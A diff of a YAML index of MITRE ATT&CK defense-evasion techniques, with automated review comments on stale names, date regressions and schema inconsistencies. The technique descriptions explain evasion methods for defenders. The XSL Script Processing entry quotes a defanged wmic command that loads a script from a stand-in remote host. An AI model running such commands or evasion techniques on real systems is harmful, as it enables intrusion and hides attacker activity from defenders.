+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Walker Johnson
+ x_mitre_deprecated: false
x_mitre_detection: It may be uncommon for events related to benign command-line
functions such as DEL or third-party utilities or tools to be found in an
environment, depending on the user base and how systems are typically used.
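Review bot: the `name` re-emitted for T1070.004 is still `Indicator Removal on Host: File Deletion`, although the parent technique was renamed to `Indicator Removal` in ATT&CK v12 and this entry is being regenerated with `modified: '2024-10-15T16:33:59.107Z'` and `atomic_tests: []`; check where the name is sourced from (an atomic display name would explain it, the STIX bundle would not) so the index does not keep a stale parent name.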
@@ -12452,18 +12753,36 @@ defense-evasion:
network that an adversary could introduce. Some monitoring tools may collect
command-line arguments, but may not capture DEL commands since DEL is a native
function within cmd.exe.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Deletion'
x_mitre_defense_bypassed:
- Host forensic analysis
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c
+ created: '2020-01-31T12:35:36.479Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/004
+ external_id: T1070.004
+ - source_name: Microsoft SDelete July 2016
+ description: Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February
+ 8, 2018.
+ url: https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.004
atomic_tests: []
T1221:
@@ -12525,7 +12844,7 @@ defense-evasion:
description: Hanson, R. (2016, September 24). phishery. Retrieved July 21,
2018.
source_name: ryhanson phishery SEPT 2016
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-01-12T18:16:56.176Z'
name: Template Injection
description: |-
Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
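Review bot: `modified` for T1221 moves backwards, from 2022-05-11 to 2022-01-12, the opposite direction from every 3.2.0 entry above it; the same regression appears below for T1134, Hidden File System, Thread Local Storage, Debugger Evasion, DLL Side-Loading, Ptrace System Calls and Dynamic API Resolution. That pattern suggests these objects were read from a different bundle snapshot than the rest of the file; confirm the generator is fed a single bundle.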
@@ -12555,13 +12874,11 @@ defense-evasion:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1221
atomic_tests: []
T1134:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.762Z'
name: Access Token Manipulation
description: |-
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
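Review bot: T1221 drops both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` instead of being bumped to 3.2.0 the way T1556.001 and T1556.005 are, and elsewhere in this diff `x_mitre_attack_spec_version` is left at 2.1.0 for T1622 and at 3.1.0 for T1036.006 and T1550.002, so after this change the file carries four different states of that field. If consumers care about it, regenerate every entry from one bundle; if they do not, drop it everywhere rather than per technique.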
@@ -12658,7 +12975,6 @@ defense-evasion:
url: https://pentestlab.blog/2017/04/03/token-manipulation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1027.002:
technique:
@@ -12721,7 +13037,6 @@ defense-evasion:
url: https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1027.002
atomic_tests: []
T1564.005:
@@ -12759,7 +13074,7 @@ defense-evasion:
description: 'Kaspersky Lab''s Global Research and Analysis Team. (2015, February).
Equation Group: Questions and Answers. Retrieved December 21, 2015.'
url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-29T15:12:11.024Z'
name: Hidden File System
description: |-
Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
@@ -12786,8 +13101,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1055.005:
technique:
@@ -12815,7 +13128,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:24:54.198Z'
name: Thread Local Storage
description: "Adversaries may inject malicious code into processes via thread
local storage (TLS) callbacks in order to evade process-based defenses as
@@ -12859,8 +13172,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1622:
technique:
@@ -12915,7 +13226,7 @@ defense-evasion:
Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent()
and NtQueryInformationProcess()
, or manually checking the BeingDebugged
flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW()
.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-16T15:05:55.918Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Debugger Evasion
x_mitre_detection: |-
@@ -12935,7 +13246,6 @@ defense-evasion:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1622
atomic_tests: []
T1036.006:
@@ -12985,7 +13295,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1036.006
atomic_tests: []
T1550.002:
@@ -13040,12 +13349,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1550.002
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -13095,12 +13403,11 @@ defense-evasion:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1216.002:
technique:
- modified: '2024-04-18T23:51:40.464Z'
+ modified: '2024-09-12T19:42:21.547Z'
name: SyncAppvPublishingServer
description: "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution
of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.
@@ -13160,8 +13467,8 @@ defense-evasion:
- source_name: 7 - appv
description: Nick Landers. (2017, August 8). Need a signed alternative to
Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered..
- Retrieved February 6, 2024.
- url: https://twitter.com/monoxgas/status/895045566090010624
+ Retrieved September 12, 2024.
+ url: https://x.com/monoxgas/status/895045566090010624
- source_name: 3 - appv
description: 'Raj Chandel. (2022, March 17). Indirect Command Execution: Defense
Evasion (T1202). Retrieved February 6, 2024.'
@@ -13178,37 +13485,18 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1548.006:
technique:
- modified: '2024-04-17T00:02:12.021Z'
+ modified: '2024-10-16T16:54:56.714Z'
name: TCC Manipulation
- description: "Adversaries can manipulate or abuse the Transparency, Consent,
- & Control (TCC) service or database to execute malicious applications with
- elevated permissions. TCC is a Privacy & Security macOS control mechanism
- used to determine if the running process has permission to access the data
- or services protected by TCC, such as screen sharing, camera, microphone,
- or Full Disk Access (FDA).\n\nWhen an application requests to access data
- or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
- located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
- for existing permissions. If permissions do not exist, then the user is prompted
- to grant permission. Once permissions are granted, the database stores the
- application's permissions and will not prompt the user again unless reset.
- For example, when a web browser requests permissions to the user's webcam,
- once granted the web browser may not explicitly prompt the user again.(Citation:
- welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
- abuse the TCC service to execute malicious content. This can be done in various
- ways, including using privileged system applications to execute malicious
- payloads or manipulating the database to grant their application TCC permissions.
- \n\nFor example, adversaries can use Finder, which has FDA permissions by
- default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
- while preventing a user prompt. For a system without System Integrity Protection
- (SIP) enabled, adversaries have also manipulated the operating system to load
- an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
- TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
- inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
- into targeted applications with the desired TCC permissions.\n"
+ description: |+
+ Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+ When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+ Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
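Review bot: the re-emitted TCC description says the daemon checks the database `and an overwrites file (if connected to an MDM)`, which reads as a typo for the MDM overrides file, and the `|+` block scalar keeps the trailing blank line as part of the description value while the other descriptions in this file use `|-`. Both are upstream text, so either fix them upstream or have the generator normalise the chomping indicator so the value does not end in newlines.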
@@ -13216,6 +13504,8 @@ defense-evasion:
phase_name: privilege-escalation
x_mitre_contributors:
- Marina Liang
+ - Wojciech Reguła @_r3ggi
+ - Csaba Fitzl @theevilbit of Kandji
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -13223,7 +13513,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- macOS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Modification'
@@ -13253,7 +13543,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.008:
technique:
@@ -13299,7 +13588,7 @@ defense-evasion:
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
source_name: Chokepoint preload rootkits
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:26:31.766Z'
name: Ptrace System Calls
description: "Adversaries may inject malicious code into processes via ptrace
(process trace) system calls in order to evade process-based defenses as well
@@ -13344,8 +13633,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1027.007:
technique:
@@ -13390,7 +13677,7 @@ defense-evasion:
To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-08-23T18:32:46.899Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Obfuscated Files or Information: Dynamic API Resolution'
x_mitre_detection: ''
@@ -13404,58 +13691,28 @@ defense-evasion:
- 'Process: OS API Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027.007
atomic_tests: []
T1055.015:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
- type: attack-pattern
- created: '2021-11-22T15:02:15.190Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1055.015
- url: https://attack.mitre.org/techniques/T1055/015
- - source_name: Microsoft List View Controls
- url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
- description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
- January 4, 2022.
- - source_name: Modexp Windows Process Injection
- url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
- description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
- Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
- Retrieved November 15, 2021.'
- - source_name: ESET InvisiMole June 2020
- url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
- HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-14T17:34:33.948Z'
name: 'Process Injection: ListPlanting'
description: "Adversaries may abuse list-view controls to inject malicious code
into hijacked processes in order to evade process-based defenses as well as
possibly elevate privileges. ListPlanting is a method of executing arbitrary
- code in the address space of a separate live process. Code executed via ListPlanting
- may also evade detection from security products since the execution is masked
- under a legitimate process.\n\nList-view controls are user interface windows
- used to display collections of items.(Citation: Microsoft List View Controls)
- Information about an application's list-view settings are stored within the
- process' memory in a SysListView32
control.\n\nListPlanting (a
- form of message-passing \"shatter attack\") may be performed by copying code
- into the virtual address space of a process that uses a list-view control
- then using that code as a custom callback for sorting the listed items.(Citation:
- Modexp Windows Process Injection) Adversaries must first copy code into the
- target process’ memory space, which can be performed various ways including
- by directly obtaining a handle to the SysListView32
child of
- the victim process window (via Windows API calls such as FindWindow
+ code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+ Code executed via ListPlanting may also evade detection from security products
+ since the execution is masked under a legitimate process.\n\nList-view controls
+ are user interface windows used to display collections of items.(Citation:
+ Microsoft List View Controls) Information about an application's list-view
+ settings are stored within the process' memory in a SysListView32
+ control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+ be performed by copying code into the virtual address space of a process that
+ uses a list-view control then using that code as a custom callback for sorting
+ the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+ must first copy code into the target process’ memory space, which can be performed
+ various ways including by directly obtaining a handle to the SysListView32
+ child of the victim process window (via Windows API calls such as FindWindow
and/or EnumWindows
) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
methods.\n\nSome variations of ListPlanting may allocate memory in the target
process but then use window messages to copy the payload, to avoid the use
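Review bot: almost all of this hunk is key reordering (`x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `external_references`, `id`, `type` and `created` are removed here and re-added at the bottom of the object in the following hunks); the substantive changes are the `modified` bump and the `(Citation: Hexacorn Listplanting)` added to the end of the first sentence, which matches the new Hexacorn reference and the 1.0 to 1.1 version bump below. A fixed key order in the generator, or a sorted dump, would keep regenerations like this to a handful of lines and make the content changes reviewable.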
@@ -13472,6 +13729,9 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - ESET
+ x_mitre_deprecated: false
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -13486,21 +13746,52 @@ defense-evasion:
arguments.\n\nAnalyze process behavior to determine if a process is performing
unusual actions, such as opening network connections, reading files, or other
suspicious actions that could relate to post-compromise behavior. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Modification'
- 'Process: OS API Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+ created: '2021-11-22T15:02:15.190Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1055/015
+ external_id: T1055.015
+ - source_name: Hexacorn Listplanting
+ description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+ trick. Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+ - source_name: ESET InvisiMole June 2020
+ description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+ HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+ - source_name: Microsoft List View Controls
+ description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+ January 4, 2022.
+ url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+ - source_name: Modexp Windows Process Injection
+ description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+ Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+ Retrieved November 15, 2021.'
+ url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1055.015
atomic_tests: []
T1484:
technique:
- modified: '2024-04-19T04:27:31.884Z'
+ modified: '2024-10-15T15:55:32.946Z'
name: Domain or Tenant Policy Modification
description: "Adversaries may modify the configuration settings of a domain
or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -13545,9 +13836,8 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '3.0'
+ - Identity Provider
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Deletion'
- 'Active Directory: Active Directory Object Creation'
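Review bot: `Azure AD` and `SaaS` are dropped from `x_mitre_platforms` and replaced by `Identity Provider`, with the version bumped from 3.0 to 3.1; the same `Azure AD`/`Office 365`/`Google Workspace` to `Identity Provider`/`Office Suite` rename appears on T1550.001, T1078.004 and T1556 later in the diff. Anything in the repo that filters techniques by platform string, including any per-platform index, needs the new names, so please confirm those are regenerated in the same PR rather than left keyed on the old platform names.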
@@ -13604,8 +13894,8 @@ defense-evasion:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Sygnia Golden SAML
description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
Attack. Retrieved January 6, 2021.
@@ -13614,57 +13904,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1220:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Avneet Singh
- - Casey Smith
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
- created: '2018-10-17T00:14:20.652Z'
- x_mitre_version: '1.2'
- external_references:
- - source_name: mitre-attack
- external_id: T1220
- url: https://attack.mitre.org/techniques/T1220
- - source_name: Reaqta MSXSL Spearphishing MAR 2018
- url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
- description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
- MSXSL. Retrieved July 3, 2018.
- - source_name: Twitter SquiblyTwo Detection APR 2018
- url: https://twitter.com/dez_/status/986614411711442944
- description: Desimone, J. (2018, April 18). Status Update. Retrieved July
- 3, 2018.
- - source_name: LOLBAS Wmic
- url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
- description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
- - source_name: Microsoft msxsl.exe
- url: https://www.microsoft.com/download/details.aspx?id=21714
- description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
- Retrieved July 3, 2018.
- - source_name: Penetration Testing Lab MSXSL July 2017
- url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
- description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
- July 3, 2018.
- - source_name: XSL Bypass Mar 2019
- url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
- description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
- Proxy Code Execution. Retrieved August 2, 2019.
- - source_name: Microsoft XSLT Script Mar 2017
- url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
- description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
- Using . Retrieved July 3, 2018.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-12T19:40:12.337Z'
+ name: XSL Script Processing
description: |-
Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
@@ -13682,29 +13926,73 @@ defense-evasion:
* Local File: wmic process list /FORMAT:evil[.]xsl
* Remote File: wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: XSL Script Processing
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Avneet Singh
+ - Casey Smith
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
- kill_chain_phases:
- - phase_name: defense-evasion
- kill_chain_name: mitre-attack
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- x_mitre_system_requirements:
- - Microsoft Core XML Services (MSXML) or access to wmic.exe
x_mitre_defense_bypassed:
- Anti-virus
- Digital Certificate Validation
- Application Control
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_system_requirements:
+ - Microsoft Core XML Services (MSXML) or access to wmic.exe
+ type: attack-pattern
+ id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
+ created: '2018-10-17T00:14:20.652Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1220
+ external_id: T1220
+ - source_name: Reaqta MSXSL Spearphishing MAR 2018
+ description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
+ MSXSL. Retrieved July 3, 2018.
+ url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
+ - source_name: Twitter SquiblyTwo Detection APR 2018
+ description: Desimone, J. (2018, April 18). Status Update. Retrieved September
+ 12, 2024.
+ url: https://x.com/dez_/status/986614411711442944
+ - source_name: LOLBAS Wmic
+ description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
+ url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
+ - source_name: Microsoft msxsl.exe
+ description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
+ Retrieved July 3, 2018.
+ url: https://www.microsoft.com/download/details.aspx?id=21714
+ - source_name: Penetration Testing Lab MSXSL July 2017
+ description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
+ July 3, 2018.
+ url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
+ - source_name: XSL Bypass Mar 2019
+ description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
+ Proxy Code Execution. Retrieved August 2, 2019.
+ url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
+ - source_name: Microsoft XSLT Script Mar 2017
+ description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
+ Using . Retrieved July 3, 2018.
